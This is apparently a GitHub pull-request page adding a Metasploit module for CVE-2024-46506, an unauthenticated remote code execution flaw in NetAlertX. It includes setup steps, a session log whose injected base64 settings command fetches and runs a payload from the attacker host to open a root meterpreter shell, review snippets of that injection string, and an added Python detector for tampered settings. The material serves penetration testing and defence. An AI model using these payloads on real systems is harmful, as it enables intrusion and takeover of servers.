Add NetAlertX unauthenticated RCE module (CVE-2024-46506) #19868

Merged (10 commits), Feb 11, 2025

Conversation

Takahiro-Yoko
@Takahiro-Yoko Takahiro-Yoko commented Feb 8, 2025

https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/

Vulnerable Application

An attacker can update NetAlertX settings with no authentication, which results in RCE.

The vulnerability affects:

* v23.01.14 <= NetAlertX <= v24.9.12

This module was successfully tested on:

* NetAlertX v24.9.12 installed with Docker on Ubuntu 22.04

Installation

  1. docker pull jokobsk/netalertx:24.9.12

  2. docker run

docker run --rm --network=host \
  -v /tmp/netalertx:/app/config \
  -v /tmp/netalertx:/app/db \
  -e TZ=Europe/Berlin \
  -e PORT=20211 \
  jokobsk/netalertx:24.9.12

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/netalertx_rce_cve_2024_46506
  4. Do: run lhost=<lhost> rhost=<rhost>
  5. You should get a meterpreter

Scenarios

msf6 > use exploit/linux/http/netalertx_rce_cve_2024_46506
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > run lhost=192.168.56.1 rhost=192.168.56.17
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 24.9.12 detected.
[*] Sent request to update DBCLNP_CMD to '/bin/bash -c echo${IFS}d2dldCAtcU8gLi9rblNZWmZCTkdiSyBodHRwOi8vMTkyLjE2OC41Ni4xOjgwODAvRy04Zjhua29IMGRUWkdQc052UzIzZztjaG1vZCAreCAuL2tuU1laZkJOR2JLOy4va25TWVpmQk5HYksmc2xlZXAgMztybSAtcmYgLi9rblNZWmZCTkdiSw==|base64${IFS}-d|/bin/bash'.
[*] Waiting settings really updated...
[*] Added the payload to the queue. Waiting for the payload to run...
[*] Sending stage (3045380 bytes) to 192.168.56.17
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:53484) at 2025-02-08 14:40:02 +0900
[*] Sent request to update DBCLNP_CMD to 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.17
OS           :  (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
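One defender-side check suggested by the session above, as an added example that is not part of the module or of NetAlertX: compare the stored DBCLNP_CMD setting with the stock db_cleanup command line the module restores at the end, and flag shell-injection constructs in it. The KEY='value' config layout and the sample lines are constructed assumptions for this example, not NetAlertX's real app.conf format.

```python
import re

# Stock value of DBCLNP_CMD, as shown in the session output above when the
# module restores the setting after the payload has run.
EXPECTED_DBCLNP_CMD = (
    "python3 /app/front/plugins/db_cleanup/script.py "
    "pluginskeephistory={pluginskeephistory} "
    "hourstokeepnewdevice={hourstokeepnewdevice} "
    "daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}"
)

# Shell constructs the db_cleanup command line never legitimately contains.
SUSPICIOUS = re.compile(r"\$\{IFS\}|\|\s*base64|/bin/(ba)?sh\s+-c|\b(wget|curl)\b")

# Assumed KEY='value' line layout; constructed for this example, not taken
# from NetAlertX's real app.conf.
SETTING_RE = re.compile(r"^\s*([A-Z0-9_]+)\s*=\s*'(.*)'\s*$")


def parse_settings(text):
    """Return {key: value} for every line that matches KEY='value'."""
    settings = {}
    for line in text.splitlines():
        m = SETTING_RE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def check_dbclnp_cmd(settings):
    """Return findings for a tampered DBCLNP_CMD; an empty list means clean."""
    cmd = settings.get("DBCLNP_CMD")
    findings = []
    if cmd is None:
        return findings
    if cmd != EXPECTED_DBCLNP_CMD:
        findings.append("DBCLNP_CMD differs from the stock db_cleanup command")
    if SUSPICIOUS.search(cmd):
        findings.append("DBCLNP_CMD contains shell-injection constructs")
    return findings


# Constructed samples: a clean config and one carrying the same shape of
# injected value the module writes (the base64 here decodes to a harmless echo).
CLEAN_CONF = "SCAN_SUBNETS='192.168.56.0/24'\nDBCLNP_CMD='" + EXPECTED_DBCLNP_CMD + "'\n"
TAMPERED_CONF = "DBCLNP_CMD='/bin/sh -c echo${IFS}ZWNobyBjb25zdHJ1Y3RlZA==|base64${IFS}-d|/bin/sh'\n"

if __name__ == "__main__":
    for name, conf in (("clean", CLEAN_CONF), ("tampered", TAMPERED_CONF)):
        print(name, check_dbclnp_cmd(parse_settings(conf)) or ["ok"])
```

Running the same check against the live config after the restore step in the session above would report the stock value as clean, since the module writes the original command back.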

@msutovsky-r7 msutovsky-r7 self-assigned this Feb 9, 2025

@msutovsky-r7 msutovsky-r7 left a comment

Hi @Takahiro-Yoko, I left some comments; however, the module seems to be working. I'll do additional testing and provide feedback.

'Linux Command', {
  'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
  'DefaultOptions' => {
    'FETCH_COMMAND' => 'WGET'
Contributor

Is there some degree of certainty that wget should be present as default?

@Takahiro-Yoko Takahiro-Yoko Feb 10, 2025

(Assuming Docker is used) It seems that both curl and wget are available in the vulnerable version of the NetAlertX Docker container, so there may be no need to specify wget as the default. https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/Dockerfile#L60 9f43fcc Thanks!

# subprocess.check_output(command, universal_newlines=True, stderr=subprocess.STDOUT, timeout=(set_RUN_TIMEOUT))
# https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L206
# https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L214
cmd = "/bin/bash -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/bash"
Contributor

Suggested change
cmd = "/bin/bash -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/bash"
cmd = "/bin/sh -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/sh"

Smaller payload (yay!), and more portable, and not every Linux system has bash installed.

Contributor

Do we need to encode manually? What characters are we trying to avoid, and what happens if we pass them into the payload portion of the info hash as bad characters?

Contributor Author


Thanks! Updated to use sh. edbdb98

Updated to use BadChars. 2db7f4f Seems like only base64 -d works fine. Without /bin/sh -c, the payload fails. Thanks!

Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
@Takahiro-Yoko Takahiro-Yoko changed the title Add NetAlertx unauthenticated RCE module (CVE-2024-46506) Add NetAlertX unauthenticated RCE module (CVE-2024-46506) Feb 11, 2025
@msutovsky-r7 msutovsky-r7 merged commit 984f0db into rapid7:master Feb 11, 2025
31 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 11, 2025
msutovsky-r7 commented Feb 11, 2025

Release Notes

A new module for an unauthenticated remote code execution bug in NetAlertX (CVE-2024-46506). An unauthenticated attacker can change the system configuration and force the application to run arbitrary system commands, leading to remote code execution.
